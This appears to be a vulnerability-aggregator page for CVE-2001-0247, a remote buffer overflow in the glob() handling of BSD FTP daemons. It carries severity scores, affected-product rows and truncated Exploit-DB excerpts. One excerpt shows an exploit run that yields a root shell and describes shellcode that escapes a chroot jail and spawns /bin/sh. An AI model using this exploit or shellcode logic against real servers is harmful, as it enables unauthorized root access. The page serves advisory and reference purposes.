CVE-2001-0247
published 2001-06-18CVE-2001-0247: Buffer overflows in BSD-based FTP servers allows remote attackers to execute arbitrary commands via a long pattern string containing a {} sequence, as seen in…
PriorityP347critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
19.32%
97.0th percentile
Buffer overflows in BSD-based FTP servers allows remote attackers to execute arbitrary commands via a long pattern string containing a {} sequence, as seen in (1) g_opendir, (2) g_lstat, (3) g_stat, and (4) the glob0 buffer as used in the glob functions glob2 and glob3.
Affected
51 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| freebsd | freebsd | — | — |
| freebsd | freebsd | — | — |
| freebsd | freebsd | — | — |
| freebsd | freebsd | — | — |
| freebsd | freebsd | — | — |
| freebsd | freebsd | — | — |
| freebsd | freebsd | — | — |
| freebsd | freebsd | — | — |
| freebsd | freebsd | — | — |
| freebsd | freebsd | — | — |
| freebsd | freebsd | — | — |
| freebsd | freebsd | — | — |
| freebsd | freebsd | — | — |
| freebsd | freebsd | — | — |
| freebsd | freebsd | — | — |
| freebsd | freebsd | — | — |
| freebsd | freebsd | — | — |
| freebsd | freebsd | — | — |
| mit | kerberos_5 | — | — |
| mit | kerberos_5 | — | — |
| mit | kerberos_5 | — | — |
| mit | kerberos_5 | — | — |
| netbsd | netbsd | — | — |
| netbsd | netbsd | — | — |
| netbsd | netbsd | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
FreeBSD 4.2-stable - FTPd 'glob()' Remote Buffer Overflow
exploitdb·2001-04-16
CVE-2001-0247 FreeBSD 4.2-stable - FTPd 'glob()' Remote Buffer Overflow
FreeBSD 4.2-stable - FTPd 'glob()' Remote Buffer Overflow
---
source: https://www.securityfocus.com/bid/2548/info
The BSD ftp daemon and derivatives (such as IRIX ftpd or the ftp daemon shipped with Kerberos 5) contain a number of buffer overflows that may lead to a compromise of root access to malicious users.
During parsing operations, the ftp daemon assumes that there can never be more than 512 bytes of user-supplied data. This is because that is usually how much data is read from a socket. Because of this assumption, certain memory copy operations involving user data lack bounds checking.
It is possible for users to use metacharacters to expand file/path names through interpretation by glob() and exploit these overflowable conditions. In order to do so, the attacker's ftp account
Exploit-DB
OpenBSD 2.x < 2.8 FTPd - 'glob()' Remote Buffer Overflow
exploitdb·2001-04-16
CVE-2001-0247 OpenBSD 2.x < 2.8 FTPd - 'glob()' Remote Buffer Overflow
OpenBSD 2.x pwd
257 "/test" is current directory.
ftp> dir
229 Entering Extended Passive Mode (|||12574|)
150 Opening ASCII mode data connection for '/bin/ls'.
total 2
drwxr-xr-x 2 1000 0 512 Apr 14 14:14 12345678901234567
226 Transfer complete.
.....
$ ./leheehel -c /test -l 17 -s0xdfbeb970 localhost
// 230 Guest login ok, access restrictions apply.
// 250 CWD command successful.
retaddr = dfbeb970
Press enter..
remember to remove the "adfa"-dir
id
uid=0(root) gid=32766(nogroup) groups=32766(nogroup)
The shellcode basically does:
seteuid(0); a = open("..", O_RDONLY); mkdir("adfa", 555);
chroot("adfa"); fchdir(a); for(cnt = 100; cnt; cnt--)
chdir("..");
chroot(".."); execve("/bin//sh", ..);
Credits:
COVERT for their advisory.
The OpenBSD devteam for a great OS.
beercan for letting me test
Exploit-DB
FreeBSD 2.2-4.2 / NetBSD 1.2-4.5 / OpenBSD 2.x - FTPd 'glob()' Remote Buffer Overflow
exploitdb·2001-04-14
CVE-2001-0247 FreeBSD 2.2-4.2 / NetBSD 1.2-4.5 / OpenBSD 2.x - FTPd 'glob()' Remote Buffer Overflow
FreeBSD 2.2-4.2 / NetBSD 1.2-4.5 / OpenBSD 2.x - FTPd 'glob()' Remote Buffer Overflow
---
// source: https://www.securityfocus.com/bid/2548/info
The BSD ftp daemon and derivatives (such as IRIX ftpd or the ftp daemon shipped with Kerberos 5) contain a number of buffer overflows that may lead to a compromise of root access to malicious users.
During parsing operations, the ftp daemon assumes that there can never be more than 512 bytes of user-supplied data. This is because that is usually how much data is read from a socket. Because of this assumption, certain memory copy operations involving user data lack bounds checking.
It is possible for users to use metacharacters to expand file/path names through interpretation by glob() and exploit these overflowable conditions. In order to do
No writeups or analysis indexed.
ftp://ftp.NetBSD.ORG/pub/NetBSD/misc/security/advisories/NetBSD-SA2000-018.txt.ascftp://patches.sgi.com/support/free/security/advisories/20010802-01-Phttp://archives.neohapsis.com/archives/freebsd/2001-04/0466.htmlhttp://www.cert.org/advisories/CA-2001-07.htmlhttp://www.nai.com/research/covert/advisories/048.asphttp://www.securityfocus.com/bid/2548https://exchange.xforce.ibmcloud.com/vulnerabilities/6332ftp://ftp.NetBSD.ORG/pub/NetBSD/misc/security/advisories/NetBSD-SA2000-018.txt.ascftp://patches.sgi.com/support/free/security/advisories/20010802-01-Phttp://archives.neohapsis.com/archives/freebsd/2001-04/0466.htmlhttp://www.cert.org/advisories/CA-2001-07.htmlhttp://www.nai.com/research/covert/advisories/048.asphttp://www.securityfocus.com/bid/2548https://exchange.xforce.ibmcloud.com/vulnerabilities/6332
2001-06-18
Published